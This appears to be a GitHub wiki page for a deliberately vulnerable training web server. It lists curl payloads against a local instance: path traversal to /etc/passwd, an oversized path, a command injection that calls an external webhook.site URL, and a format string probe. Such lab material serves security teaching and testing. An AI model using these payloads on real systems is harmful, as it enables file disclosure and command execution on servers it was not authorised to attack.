-
Notifications
You must be signed in to change notification settings - Fork 0
Home
Sam Sanoop edited this page May 4, 2025
·
3 revisions
Welcome to the damn-vulnerable-web-server wiki!
curl --path-as-is "http://127.0.0.1:8081/../../../../../../../etc/passwd"
curl --path-as-is "http://127.0.0.1:8081/$(python3 -c 'print("A"*300)')"
example request
curl "http://127.0.0.1:8081/logs?filter=200"
command injection payload
`curl "http://127.0.0.1:8081/logs?filter=foobar%20/tmp/server.log;curl%20https://webhook.site/d5e64a1e-9c6c-4891-ae79-a79e7e9012bd%20&&%20cat"
Format String Attack
`curl "http://127.0.0.1:8081/echo.php?input=%p%p%p"`